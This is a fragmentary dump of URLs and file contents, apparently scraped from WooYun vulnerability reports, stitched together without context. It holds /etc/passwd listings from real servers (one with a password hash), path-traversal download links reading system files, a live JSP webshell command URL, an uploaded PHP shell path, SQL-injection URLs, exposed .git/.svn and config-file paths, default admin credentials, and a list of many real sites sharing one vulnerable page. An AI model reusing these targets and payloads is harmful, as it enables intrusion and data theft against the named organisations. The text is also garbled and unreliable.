vcsa:x:69:69:virtual owner:/dev:/sbin/nologin nscd:x:28:28:NSCD Daemon:/:/sbin/nologin rpm:x:37:37::/var/lib/rpm:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin netdump:x:34:34:Network user:/var/crash:/bin/bash sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin rpc:x:32:32:Portmapper user:/:/sbin/nologin rpcuser:x:29:29:RPC User:/var/lib/nfs:/sbin/nologin nfsnobody:x:65534:65534:Anonymous User:/var/lib/nfs:/sbin/nologin mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin pcap:x:77:77::/var/arpwatch:/sbin/nologin apache:x:48:48:Apache:/var/www/html:/sbin/nologin squid:x:23:23::/var/spool/squid:/sbin/nologin webalizer:x:67:67:Webalizer:/www/usage:/sbin/nologin xfs:x:43:43:X Server:/etc/X11/fs:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin htt:x:100:101:IIIMF Htt:/usr/lib/im:/sbin/nologin mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash named:x:25:25:Named:/var/named:/bin/bash ldap:x:55:55:LDAP User:/var/lib/ldap:/bin/false temp:x:65530:65530:Remote User:/tmp:/etc/telnet.remote webadm:x:49:100::/array:/sbin/nologin cactiuser:x:516:100::/tmp:/bin/bash guest:x:518:518::/ftp/guest:/sbin/nologin tfjj:x:520:521::/array/ftp/tfjj:/sbin/nologin wave:x:519:520::/array/wave/:/sbin/nologin wave1:x:519:520::/array/wave_ftp/:/sbin/nologin mvip:x:521:520::/array/wavevip:/sbin/nologin mhvip:x:521:520::/array/wavevip:/sbin/nologin vip:x:522:520::/array/wavevip:/sbin/nologin uploader:x:523:50::/array/ftp/downloader:/sbin/nologin downloader:x:524:50::/array/ftp/downloader:/sbin/nologin jhah:x:527:528::/array/ftp/jhyb:/sbin/nologin jhjx:x:528:528::/array/ftp/jhyb:/sbin/nologin jhsh:x:529:528::/array/ftp/jhyb:/sbin/nologin jhzj:MQSX8u3OXu6nA:530:528::/array/ftp/jhyb:/sbin/nologin jhsd:x:531:528::/array/ftp/jhyb:/sbin/nologin jhjs:x:531:528::/array/ftp/jhyb:/sbin/nologin jhfj:x:531:528::/array/ftp/jhyb:/sbin/nologin huangw:x:525:526::/array/users/huangw:/sbin/nologin baode:x:14:50::/mega/ftp/ftp/pub/baode:/sbin/nologin yangqz:x:533:533::/array/ftp/yangqz:/sbin/nologin yangk:x:534:100::/array/ftp/yangk:/sbin/nologin bailn:x:534:100::/array/ftp/bailn:/sbin/nologin yuhui:x:535:48::/array/ftp/yuhui:/sbin/nologin yangyh:x:539:539::/home/yangyh:/sbin/nologin wangxf:x:65534:65534::/array/users/wangxf:/sbin/nologin baoxw:x:65534:65534::/array/users/baoxw:/sbin/nologin tangj:x:1023:99::/array/users/tangj:/sbin/nologin tany:x:1025:50::/home/tany:/sbin/nologin grapestcm:x:1024:1029::/home/grapes_tcm:/sbin/nologin grapes:x:1026:1029::/home/grapes_tcm:/sbin/nologin yuh:x:535:48::/array/pictures/cloud/fcst:/sbin/nologin cloud:x:48:48::/array/pictures/cloud/fy2:/sbin/nologin ldm:x:536:536::/home/ldm:/bin/bash tigge:x:538:538::/home/tigge:/sbin/nologin tfs973:x:541:100::/array/973.typhoon.gov.cn:/sbin/nologin yingm:x:544:100::/array/pictures/cloud:/sbin/nologin chenpy:x:48:48::/array/pictures/rain/fy2c:/sbin/nologin tlfdp:x:48:48::/array/tlfdp.typhoon.gov.cn:/sbin/nologin nagios:x:545:546::/usr/local/nagios:/bin/bash expertteam:x:1021:1021::/array/vsftpuser/expertteam:/sbin/nologin gfsdata:x:1022:1028::/home/gfsdata:/sbin/nologin yiny:x:1027:100::/home/yiny:/bin/bash zhoux:x:1028:50::/mega/ftp/ftp/pub/WMO:/sbin/nologin data:x:1029:1031::/mega/data:/sbin/nologin test1:x:1029:1032::/mega/ftp/ftp/users/test1:/sbin/nologin http://973.typhoon.gov.cn/down.php?f=L2V0Yy9ob3N0cw== http://973.typhoon.gov.cn/down.php?f=L2V0Yy9pc3N1ZQ== http://pjmini.chanjet.com、正面拿不下来,于是旁注了下。 http://udp.ufida.com.cn/utilityOnline.asp http://oa.uoh.edu.cn/userLogin.action http://www.wooyun.org/bugs/wooyun-2010-0111053/trace/08fc5b92c865984154cbf23a9f250316 http://www.bjprd.com.cn/ http://jfx.nju.edu.cn/sbweb/nameedit.asp?table=bbs&id=1&action=edit http://202.118.31.223:801/sbweb/nameedit.asp?table=bbs&id=1&action=edit http://210.40.208.4/sbweb/nameedit.asp?table=bbs&id=1&action=edit http://210.40.208.4/sbweb/nameedit.asp?table=bbs&id=1&action=edit http://210.27.80.81/sbweb/nameedit.asp?table=bbs&id=1&action=edit http://202.113.128.61/sbweb/nameedit.asp?table=bbs&id=1&action=edit http://202.38.194.243/sbweb/nameedit.asp?table=bbs&id=1&action=edit http://202.119.206.110/sbweb/nameedit.asp?table=bbs&id=1&action=edit http://202.116.160.99/sbweb/nameedit.asp?table=bbs&id=1&action=edit http://218.6.165.33/sbweb/nameedit.asp?table=bbs&id=1&action=edit http://www2.hnit.edu.cn/sbweb/nameedit.asp?table=bbs&id=1&action=edit http://202.205.93.151/sbweb/nameedit.asp?table=bbs&id=1&action=edit http://210.30.190.86/sbweb/nameedit.asp?table=bbs&id=1&action=edit http://59.69.128.134/sbweb/nameedit.asp?table=bbs&id=1&action=edit http://210.45.192.18/sbweb/nameedit.asp?table=bbs&id=1&action=edit http://kysbc.cup.edu.cn/sbweb/nameedit.asp?table=bbs&id=1&action=edit http://www.bjprd.com.cn:88/sbweb/nameedit.asp?table=bbs&id=1&action=edit http://www.qzygz.com:8091/sbweb/nameedit.asp?table=bbs&id=1&action=edit http://amd.hzu.edu.cn/sbweb/nameedit.asp?table=bbs&id=1&action=edit http://125.223.223.15/sbweb/nameedit.asp?table=bbs&id=1&action=edit http://202.201.152.152/sbweb/nameedit.asp?table=bbs&id=1&action=edit http://202.118.31.223:801/jjweb/nameedit.asp?table=bbs&id=1&action=edit http://www.qzygz.com:8091/jjweb/nameedit.asp?table=bbs&id=1&action=edit http://202.113.128.61/jjweb/nameedit.asp?table=bbs&id=1&action=edit http://222.242.198.102:88/jjweb/nameedit.asp?table=bbs&id=1&action=edit http://202.114.242.120/jjweb/nameedit.asp?table=bbs&id=1&action=edit http://202.197.61.13/jjweb/nameedit.asp?table=bbs&id=1&action=edit http://202.119.206.110/jjweb/nameedit.asp?table=bbs&id=1&action=edit http://202.198.129.102/jjweb/nameedit.asp?table=bbs&id=1&action=edit http://219.244.71.48/jjweb/nameedit.asp?table=bbs&id=1&action=edit http://gzc.cqnu.edu.cn/jjweb/nameedit.asp?table=bbs&id=1&action=edit http://115.24.160.240/jjweb/nameedit.asp?table=bbs&id=1&action=edit http://202.205.93.151/jjweb/nameedit.asp?table=bbs&id=1&action=edit http://210.30.190.86/jjweb/nameedit.asp?table=bbs&id=1&action=edit http://218.194.177.36/jjweb/nameedit.asp?table=bbs&id=1&action=edit http://210.28.80.170/jjweb/nameedit.asp?table=bbs&id=1&action=edit http://www.bjprd.com.cn:88/jjweb/nameedit.asp?table=bbs&id=1&action=edit http://222.24.19.99/jjweb/nameedit.asp?table=bbs&id=1&action=edit http://202.115.80.155/jjweb/nameedit.asp?table=bbs&id=1&action=edit http://210.37.0.70/jjweb/nameedit.asp?table=bbs&id=1&action=edit http://202.113.128.61/dzpweb/nameedit.asp?table=bbs&id=1&action=edit http://210.27.80.81/dzpweb/nameedit.asp?table=bbs&id=1&action=edit http://202.197.61.13/dzpweb/nameedit.asp?table=bbs&id=1&action=edit http://202.119.206.110/dzpweb/nameedit.asp?table=bbs&id=1&action=edit http://210.45.215.133/dzpweb/nameedit.asp?table=bbs&id=1&action=edit http://210.29.224.35/dzpweb/nameedit.asp?table=bbs&id=1&action=edit http://202.192.18.120/dzpweb/nameedit.asp?table=bbs&id=1&action=edit http://210.37.0.70/dzpweb/nameedit.asp?table=bbs&id=1&action=edit http://218.194.177.36/dzpweb/nameedit.asp?table=bbs&id=1&action=edit http://210.30.190.86/dzpweb/nameedit.asp?table=bbs&id=1&action=edit http://210.28.80.170/dzpweb/nameedit.asp?table=bbs&id=1&action=edit http://119.1.195.23:8282/dzpweb/nameedit.asp?table=bbs&id=1&action=edit http://222.24.19.99/dzpweb/nameedit.asp?table=bbs&id=1&action=edit http://gzc.cumt.edu.cn/dzpweb/nameedit.asp?table=bbs&id=1&action=edit http://202.201.152.152/dzpweb/nameedit.asp?table=bbs&id=1&action=edit http://202.113.128.61/tsweb/nameedit.asp?table=bbs&id=1&action=edit http://202.197.61.13/tsweb/nameedit.asp?table=bbs&id=1&action=edit http://202.119.206.110/tsweb/nameedit.asp?table=bbs&id=1&action=edit http://59.67.78.170:81/tsweb/nameedit.asp?table=bbs&id=1&action=edit http://gzc.cumt.edu.cn/tsweb/nameedit.asp?table=bbs&id=1&action=edit http://www.bjprd.com.cn/tsweb/nameedit.asp?table=bbs&id=1&action=edit http://www.trmc.aec.gov.tw/utf8/big5/keyword.php?KID=14 php://input php://input root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin nscd:x:28:28:NSCD Daemon:/:/sbin/nologin vcsa:x:69:69:virtual owner:/dev:/sbin/nologin pcap:x:77:77::/var/arpwatch:/sbin/nologin rpc:x:32:32:Portmapper user:/:/sbin/nologin apache:x:48:48:Apache:/var/www:/sbin/nologin mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin oprofile:x:16:16:Special OProfile:/home/oprofile:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin xfs:x:43:43:X Server:/etc/X11/fs:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin dbus:x:81:81:System bus:/:/sbin/nologin avahi:x:70:70:Avahi daemon:/:/sbin/nologin rpcuser:x:29:29:RPC User:/var/lib/nfs:/sbin/nologin nfsnobody:x:4294967294:4294967294:Anonymous User:/var/lib/nfs:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin avahi-autoipd:x:100:103:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin sabayon:x:86:86:Sabayon user:/home/sabayon:/sbin/nologin xueyanchao:x:500:500::/home/xueyanchao:/bin/bash yangyang:x:501:500::/home/yangyang:/bin/bash liujicheng:x:502:500::/home/liujicheng:/bin/bash kankaijun:x:503:500::/home/kankaijun:/bin/bash wangfei:x:505:500::/home/wangfei:/bin/bash yutao:x:506:500::/home/yutao:/bin/bash zhousihai:x:507:500::/home/zhousihai:/bin/bash fukezhi:x:508:500::/home/fukezhi:/bin/bash liwei:x:509:500::/home/liwei:/bin/bash rongwei:x:510:500::/home/rongwei:/bin/bash mysql:x:511:501::/home/mysql:/bin/bash hjs:x:504:500::/home/hjs:/bin/bash http://mail.sina.net/login http://wcp.sina.com/ http://ss.263.net/SelfService/password/doResetPassword.action jfile.cn/test.aspx http://buy.hujiang.com/ SQL:update http://abroad.nenu.edu.cn http://bec.nenu.edu.cn http://business.nenu.edu.cn http://hjxy.nenu.edu.cn http://pe.nenu.edu.cn http://rsc.nenu.edu.cn http://tzb.nenu.edu.cn http://zhaopin.nenu.edu.cn偶然机会发现东北师大人事处网站被篡改: http://rsc.nenu.edu.cn/html/ http://abroad.nenu.edu.cn/ admin:admin) http://abroad.nenu.edu.cn/admin/ http://www.hp1997.com http://www.hp1997.com/MyCenter/forgetpassUp.aspx http://222.221.18.137:8080/portal/login.jsp http://222.221.18.137:8080/zecmd/zecmd.jsp?comment=whoami http://m.dfyl-luxgen.com/fengmang/index.aspx?cityName=%E6%9D%AD%E5%B7%9E http://cloud.culture.tw/frontsite/opendata/openCmsAction.do?method=goCMSList&menuId=10201 https://who.is/whois/cloud.culture.tw http://cloud.culture.tw/frontsite/trans/emapOpenDataAction.do?method=exportEmapJson&typeId=K&ndctype=JSON&ndcnid=6222 http://www.wcfxb.net/ http://ldfxb.com/ http://61.153.79.222:3050/ http://183.129.136.54:3050/ http://220.162.195.162:3505/ http://publicworks.tainan.gov.tw/sub_proj/park_dataHandler.ashx?area=1 http://www.cybp2c.com/borrow/detail/id/11 http://www.cybp2c.com/borrow/detail?id=11 http://hi.xxt.cn/album/aview.do?aid=22131 http://www.mojing.cn/actions/.svn/entries http://img.mojing.cn/actions/.svn/entries http://pay.mojing.cn/action/.svn/entries http://pay.mojing.cn/web/.svn/entries inurl:showDetail.jsp?info_id= http://www.mlfy.gov.cn/sfpt/channel/showDetail.jsp?info_id=201309000467 sys.sdems.com/upfiles/ sys.sdems.com/upfiles/UPImage/ sys.sdems.com/images/ sys.sdems.com/bin/ sys.sdems.com/fckeditor/ sys.sdems.com/template/ sys.sdems.com/css/ sys.sdems.com/scripts/ http://61.128.123.168/sys/main.action,如图所示: http://wooyun.org/bugs/wooyun-2015-0113942/trace/12dcf13f84ed5047f384d9566441c556 inurl:ShowChannel.jsp?sys= http://www.fyfyssf.gov.cn/sfpt/channel/ShowChannel.jsp?sys=X1&menuCode=KFXW&SecMenuCode=0 http://210.34.213.107/default2.aspx http://210.34.213.105/default2.aspx http://210.34.213.88/default2.aspx http://210.34.213.107//fckeditor/editor/filemanager/browser/default/browser.html?&connector=../../connectors/aspx/connector.aspx http://210.34.213.88//fckeditor/editor/filemanager/browser/default/browser.html?&connector=../../connectors/aspx/connector.aspx http://210.34.213.105//fckeditor/editor/filemanager/browser/default/browser.html?&connector=../../connectors/aspx/connector.aspx http://www.rongdaqhd.com/soft/product.html http://60.213.186.122:81//www/seach.php?cat2id=8 http://221.193.194.131/www/seach.php?cat2id=8 http://60.10.25.13/www/seach.php?cat2id=8 http://zxzj.cangzhou.gov.cn/www/seach.php?cat2id=8 http://www.qhdzxzj.gov.cn/www/seach.php?cat2id=8 http://www.bdzxzj.gov.cn/www/seach.php?cat2id=8 http://120.197.24.136:8080/verify/login http://www.linekong.com/special/dizhen/article.php?article_id=1860 http://cdc.uibe.edu.cn/user/LoginAdmin.aspx http://lsq.playcrab.com/.git/config http://as.playcrab.com/.git/config http://gm.playcrab.com/.git/config http://222.41.148.203:8989/tietongyunwei/tietongyunwei-debug/tietongyunwei.html https://xsp.95306.cn:443/page.asp?id=-1 http://icme.zju.edu.cn/cimsks/login.action?error=true http://202.204.112.26:9092/urp-common/urp-cas.jsp http://wenda.hexun.com/question/57074.html http://wooyun.org/bugs/wooyun-2015-0113971/trace/1b3dd51db349fd504bcb37b90db8ba77 http://www.fyfyssf.gov.cn/sfpt/FORM/SF_ZXZX/SelectList.jsp http://14.204.75.26/general/ http://www.exploit-db.com/exploits/19525/ http://global.m6go.com http://182.151.210.198:8080/login.jsp http://www.niuhuhu.com/user/login http://z.yirendai.com/sell/user_login http://z.yirendai.com/sell/ http://pic.2345.com/huodong/age/?home http://218.28.193.149/Aids/Login.htm?returnUrl=%2FAids%2FIndex.do http://218.28.193.149/webhiv/page/system/yhqx/userlogin_new.jsp http://218.28.193.149/webhiv/servlet/servletda?commandType=get&cssl=4&cslist=1&cslist=10&cslist=a.id||%27@%27||a.xb,&cslist=%20a.xm%20like%20%27-bfh-1-bfh-%27%20and%20a.bbbh%20like%20%27-bfh-1-bfh-%27%20and%20a.jcjg%20=%20%270501%27%20and%20a.id%20!=%271%27&time=115513181436 http://career-elite.huawei.com/CS/question.html http://career-elite.huawei.com/CS/teaminfo.html http://www.citictelint.com/sc/culture-gallery.php?id=25 http://eelab.tsinghua.edu.cn/bbs/forum.php?fid=763&type=1 http://api.51yund.com/sport/get_user_info https://**.**.**/por/login_psw.csp https://www.zzwms.com/news/info/id/5134.html https://www.zzwms.com/news/info?id=5134或者直接加个*也行 http://broker2.esf.leju.com/ http://broker2.esf.leju.com http://broker2.esf.leju.com/statnew/agentreal http://demos.jh0101.com/goa/Jhsoft.Web.login/NewView.aspx?ID=1018 http://xncfzyjy.scau.edu.cn/index.action http://broker2.esf.leju.com/ http://broker2.esf.leju.com/statnew/companycommunity?page_size=30&block=%CC%D5%C8%BB%CD%A4 http://jidian.njfu.edu.cn/newsshow.php?cid=4&id=584 http://whyl.gov.cn/display_temp/read.php?GovAffPub=1&TopicCode=1003 http://maths.cumt.edu.cn/math/admin/admin!login.action http://t3online.chanjet.com/yyexam/ http://t3online.chanjet.com/yyexam/jsp/sm/login!truelogin http://t3online.chanjet.com/yyexam/bak.jsp http://wooyun.org/bugs/wooyun-2010-0112901 about:reader javascript://协议的代码。 http://wutongyu.info/iff.xml http://www.hereice.com/ http://14.146.224.121/systemmgr/syshelp!loadHelpFile.jspx?filename=user_manual.rar http://14.146.224.121/login.jspx http://www.xiangyahui.com/dhadmin http://www.xiangyahui.com/upload/xyh/img/20150514/14315806401032.php http://subscribe.chinadaily.com.cn https://114.80.235.168 http://125.88.109.71/login.jspx,这是一个存放历史数据的平台 http://14.146.224.121/login.jspx http://kf.bianfeng.com/.git/config http://www.jlsjj.gov.cn/page/zdxx.aspx http://www.jlsjj.gov.cn/page/ShowData.aspx?id=0&mc=%e6%94%af%e9%98%9f%e7%ae%80%e4%bb%8b&tableName=endna196ZGpq https://github.com/qxiong133/tools/blob/9995c9fe51b1bd9786bbda41a68de8198a107754/baidu_data_code/lbs_stat_log_monitor/conf/db.ini https://github.com/qxiong133/tools/blob/9995c9fe51b1bd9786bbda41a68de8198a107754/baidu_data_code/lbs_stat_log_monitor/tools/logging_db_enter.sh http://219.141.185.30/wk.htm http://219.141.185.30/webroot.rar http://ceping.bangcle.com http://online.suning.com/console/ http://www.jx.10086.cn/xcdx/web/12.jsp http://eshop.chinadaily.com.cn/ http://e.huanqiu.com https://61.167.137.138/.svn/entries https://1.190.175.50/.svn/entries https://110.249.221.34/.svn/entries https://1.189.137.210/.svn/entries https://1.189.137.242/.svn/entries https://60.219.165.218/.svn/entries https://1.62.100.50/.svn/entries https://1.189.137.234/.svn/entries www.10jqka.com.cn/baike1/采用HDWiki,而这套系统存在注入。 www.10jqka.com.cn/baike1/index.php?edition-compare-1 https://219.156.146.15/login.html https://219.156.146.15 site:chaxun.neea.edu.cn inurl:examcenter/report.cn http://chaxun.neea.edu.cn/examcenter/report.cn?name=%D5%C5%E7%F7&op=doGetCont&selectbkjb=4&selectprovince=37&selectsub=280&selectyear=1200&sfzh=37030219900222212X&state=0&zkzh= grouprun.51yund.com/grouprun/person_challenge_record?user_id=1309706 grouprun.51yund.com/claimed?group_run_id=7382&user_id=1309706&member_id=1309706&is_share=&v=2.5.0 1.feed.51yund.com/feed/feedFlowV2?feed_type=nearby&user_id=1527479&v=2.5.0 http://feed.51yund.com/feed/feedFlowV2?feed_type=friends&user_id=1244698&v=2.5.0 http://feed.51yund.com http://125.46.106.44/BaseSiteSys/login.action http://www.hnew.com.cn/Complaint.aspx http://218.28.33.84:70/ajax/GetInfoByYCY.ashx http://218.28.33.84:70/ http://218.28.33.84:9090/manage/MainForm.aspx http://218.28.33.84:9090/userfiles/bak.aspx http://www.duimian.cn:8081/giftList.php?catid=6 http://ks.cqwsrc.com/Everyone/OpenPrintTicketView.aspx?applyId=16196 https://61.178.184.30/ https://61.178.184.31/ http://220.167.144.182/ https://118.122.80.190/ http://202.103.214.170:8888/ https://222.86.132.39/ https://61.188.185.134/ https://125.72.187.158/ https://61.178.144.21/ http://118.122.80.201:8088/ http://dealer.easypass.cn/ http://www.qiche4s.cn/ http://www.qiche4s.cn/100074170/contact.html http://www.tuniu.cn/bizConfirm/snapshot/2015-03-25/orderConfirm_orderId-4922294_1427258964436.html http://www.tuniu.cn/bizConfirm/snapshot/2015-04-21/orderConfirm_orderId-5137384_1429582439629.html http://taocan.ctrip.com/VacationBooking/Order.aspx?TmpOrderid=a2bnzt2uP%2fPineHcQMS%2bpg%3d%3d http://taocan.ctrip.com/VacationBooking/Order.aspx?TmpOrderid=aLkC8eU0XgfUfmyWfKpCQQ%3d%3d http://taocan.ctrip.com/VacationBooking/Order.aspx?TmpOrderid=hPDszLcP6zYcyXvCG3EwZQ%3d%3d http://61.191.47.115/login http://www.wmu.edu.cn/view.php?id=c18e790c-f910-11e4-a3a3-d70b5c2416ab http://rsc.wmu.edu.cn/List.php?BigCategoryId=28 http://rsc.wmu.edu.cn/List.php?BigCategoryId=28&SmallCategoryId=76 http://www.boloni.com.cn/ http://test.qianbo.com.cn/Ch/3D.Asp?ID=13 http://www.juxintrade.com/Ch/3D.Asp?ID=2 http://www.snwh.gov.cn/whjiaodian/gaige30/3d.asp?id=278 http://test.qianbo.com.cn/Ch/3D.Asp?ID=13 http://ffrhy.com/Ch/3D.Asp?ID=6 http://www.caizikeji.com/Ch/3D.Asp?ID=150 http://www.juxintrade.com/Ch/3D.Asp?ID=2 http://chinarrxx.com/Ch/3D.Asp?ID=11 http://www.guandi.com.au/Ch/3D.Asp?ID=13 http://www.snwh.gov.cn/whjiaodian/gaige30/3d.asp?id=278 http://www.hy-expo.com/3d.asp?id=2 http://www.lfled.com/Ch/3D.Asp?ID=11 http://www.luckyled.com/Ch/3D.Asp?ID=13 http://www.kftiangong.com/Ch/3D.Asp?ID=8 http://www.npcxjszp.com/Ch/3D.Asp?ID=127 http://www.orange-landscape.com/orange/cn/3d.asp?Id=51 http://www.carvarcenter.com/3d.asp?id=162&aid=22 https://member.hexindai.com/member/profile/message/noticedetail-noticeid_854461-passportnoticeid_968163.html https://jr.ffan.com/crowdfunding/api/address/set https://github.com/MichaelHu/myscripts/blob/03d8d9b238d6c551fb5f36f9c261b85e81fbb7a4/apache/conf/other/rewrite.conf http://tc-apptest-img08.vm.baidu.com:8055/vs_proxy.php?request_url=http://m.baidu.com/news http://tv.cqeic.cn/BlogManage/Message/Login.aspx?APPSecret= http://tv.cqeic.cn/systemManage/Login.aspx选择系统管理员.输入 http://www.zjj.gov.cn/jscall/adshow.jsp?typecode=-1+OR+17-7%3d10 http://202.105.215.70/crm/ http://202.105.215.70/ccpvcc/ http://api.huagu.com/feedback/?cmd=list&db=mobile&typeid=0&page= http://125.88.6.156/nhzb/中国南方航空采购招标网 http://125.88.6.156/nhbpm/南航贸易业务流程管理系统 http://125.88.6.156/coms/login.jsp http://125.88.6.156/coms_sub/login.jsp http://125.88.6.156/coms_wh/login.jsp http://www.hnewzs.com.cn/Login/NewsList.aspx?KindName=%u515a%u98ce%u5ec9%u653f&KindId=100114&UnitId=100101100 http://www.hnewzs.com.cn/Login/NewsList.aspx?KindName=%u515a%u98ce%u5ec9%u653f&KindId=100114&UnitId=100101100 http://jk.hnewzs.com.cn/Login/Login.aspx?ReturnUrl=%2fDefault.aspx user:admin pwd:admin http://202.105.215.104/ccpsso/ http://202.105.215.104/ccpsso/Check?Action=checkUser http://202.105.215.104 http://www.chengrui.cc/SiteManager/crkj/index.aspx http://demo.chengrui.cc:7108//RSWeb/View.aspx?ID=1(官方demo) http://www.ningwai.net:8189/RSWeb/View.aspx?ID=1 http://pb.lz2004.com/RSWeb/View.aspx?ID=82 http://www.nbsmzx.com:8083/RSWeb/View.aspx?ID=1 http://www.xdzx.cn:9000/RSWeb/View.aspx?ID=1 http://www.jyzyzz.com:81/RSWeb/View.aspx?ID=1 http://www.tbmmis.com/Login.aspx http://yjsb.gmc.edu.cn/bmzz/index.asp?bmid=13&bmmc=%E5%AD%A6%E4%BD%8D%E5% http://www.haodai.com www.haodai.com https://member.hexindai.com/password/reset.html http://keqz.kyqq.gov.cn/admin/left.htm http://www.xinganwang.com/admin/left.htm http://fl.tq.gov.cn/admin/left.htm http://aldesm.kyqq.gov.cn/admin/left.htm http://xamjrb.kyqq.gov.cn/admin/left.htm http://www.wlhtsqykjxh.com/admin/left.htm http://xinanep.com/admin/left.htm http://njj.kyqq.gov.cn/admin/left.htm http://jlhz.kyqq.gov.cn/admin/left.htm http://blgdx.kyqq.gov.cn/admin/left.htm http://sjj.kyqq.gov.cn/admin/left.htm http://daj.kyqq.gov.cn/admin/left.htm http://jtj.kyqq.gov.cn/admin/left.htm http://www.tqzfcg.com/admin/left.htm http://ghj.kyqq.gov.cn/admin/left.htm http://slz.kyqq.gov.cn//admin/left.htm http://jlhz.kyqq.gov.cn/admin/left.htm http://jsj.kyqq.gov.cn/admin/left.htm http://www.zjcyjgs.com/admin/left.htm http://222.173.107.9:7009/JdjMessage_list.action http://222.173.107.9:7009/JdjVideo_findById.action http://222.173.107.9:7009/JdjZxdcRequestion_saveInverstIgateClicknum.action http://222.173.107.9:7009/JdjSource_findById.action http://121.33.250.49/ http://121.33.250.49/invoker/JMXInvokerServlet,进行getshell URL:http://www.doujiang.com/lifeIndex!index.action http://222.41.148.203:8989/tietongyunwei/tietongyunwei-debug/tietongyunwei.html http://www.seeyouyima.com/update_admin/login.php https://member.hexindai.com/password/reset-action_email-sign_8u5ARNqRJTEdmBEZDEw0RRXF3GlxBCFIPAQsDQxoSMwRCFkQMQBZjHEYAfHRBWEEAGh8aKgxeD1h+Ul0EFApBDVQJWAxGB0QRFEkXdQ4DCl0aCRoOBktWW3BCQU9VXw5HHUdkAkERRwpEEWZEAhYWQhoJGldBFURmQlxWCFpVKiETXxZSBlUPXQFHGRIxBwJddlJVA0EDRGpFClFXVWwWU1JWDD9HVQJUUEcZEi4NAVhUVnYTDlsDRBIJElAFBVFUA1YFVwVaFUkULEZmBhAKV1FWXCQafAtXWV8SWxQBQUkTLEc1VxBeA18AUXIaLwxTUV9dKBZUBFNCEQpDBxJPR2IAWgdmC1oAFF8EBFBTVQMKAw5eHg==.html http://oa.bjgold.com.cn/login/Login.jsp?logintype=1 url:http://oa.bjgold.com.cn/tools/SWFUpload/upload.jsp http://www.letao.com http://www.donews.com/donews.sql http://wooyun.org/bugs/wooyun-2015-0113682川师大的修复方案是前台页面不告诉你默认密码123456了。 http://zjc.sicnu.edu.cn/ http://202.115.192.98/ http://202.115.200.140:8082/ http://lx.sicnu.edu.cn http://m.chinahr.com/sftp-config.json http://mt.chinahr.com/sftp-config.json www.fcgbw.com/oa/admin1121 http://circle.51yund.com/tree/donateTop?top_type=city&is_share=true&order_type=distance&province=江苏省 http://sqlmap.org http://ip:6677/command?param1=value1&...¶mn=valuen http://ip:6677/getpackageinfo?packagename=xxx时(xxx为软件包名)可返回手机上安装的xxx所指定的任意软件包版本信息。值得注意的是,若xxx为android,可返回android系统版本信息; http://ip:6677/androidamap?action=yyy¶m2=value2&...¶mn=valuen时,AMapService将设置一intent对象,其action为com.autonavi.minimap.Intent.Action,extra为{“method”:"androidamap","action","yyy","params","¶m2=value2&...¶mn=valuen"},然后将其广播出去。搜索com.autonavi.minimap.Intent.Action,可发现AmapActionBroadcastReceiver对其进行处理。见com.autonavi.map.intent.AmapActionBroadcastReceiver中的onReceive方法 androidamap://yyy?sourceApplication=web¶m2=value2&...¶mn=valuen,并以隐式intent的形式启动注册这种uri http://ip:6677/androidamap?action=yyy¶m2=value2&...¶mn=valuen,启动目标ip中的com.autonavi.map.activity.NewMapActivity执行命令,其中yyy为上述data http://ip:6677/geolocation http://ip:6677/getpackageinfo?packagename=xxx,其中xxx为软件包名 http://ip:6677/androidamap?action=showTraffice http://ip:6677/androidamap?action=viewMap http://ip:6677/androidamap?action=indoorMap http://ip:6677/androidamap?action=myLocation http://ip:6677/androidamap?action=viewMap http://ip:6677/androidamap?action=bus http://ip:6677/androidamap?action=arroundpoi http://ip:6677/androidamap?action=route http://ip:6677/androidamap?action=keywordNavi http://ip:6677/androidamap?action=viewReGeo http://ip:6677/androidamap?action=viewPOIDetail http://ip:6677/androidamap?action=shortUrl http://ip:6677/androidamap?action=discovery http://ip:6677/androidamap?action=hotelList http://ip:6677/androidamap?action=groupbuyList http://ip:6677/androidamap?action=navi2SpecialDest http://ip:6677/androidamap?action=rootmap http://ip:6677/androidamap?action=openmap http://ip:6677/androidamap?action=openTrafficRemind http://ip:6677/androidamap?action=multiPointShow http://ip:6677/androidamap?action=navi http://ip:6677/androidamap?action=nonexist http://ip:6677/androidamap?action=openFeature的情况,这种情况对安全影响最大,是真正的远程命令执行漏洞。 https://s.bt.gg/#q=%E7%A0%94%E5%8F%91%E4%B8%8E%E6%8A%80%E6%9C%AF%E6%94%AF%E6%8C%81%EF%BC%9A%E6%AD%A6%E6%B1%89%E5%BC%98%E6%99%BA%E7%A7%91%E6%8A%80%E6%9C%89%E9%99%90%E5%85%AC%E5%8F%B8&newwindow=1&start=0 http://www.thfdc.gov.cn/Web_Site/ywzx.aspx?lmid=202 http://www.xgfdc.com.cn/Web_Site/ywzx.aspx?lmid=202 http://www.hsxfdc.com/Web_Site/ywzx.aspx?lmid=202 http://www.ljfc.gov.cn/Web_Site/ywzx.aspx?lmid=202 http://www.yxfgs.net/Web_Site/ywzx.aspx?lmid=202 http://www.hhsfcglj.com/Web_Site/ywzx.aspx?lmid=202 http://4a.51awifi.com/4a/index.htm 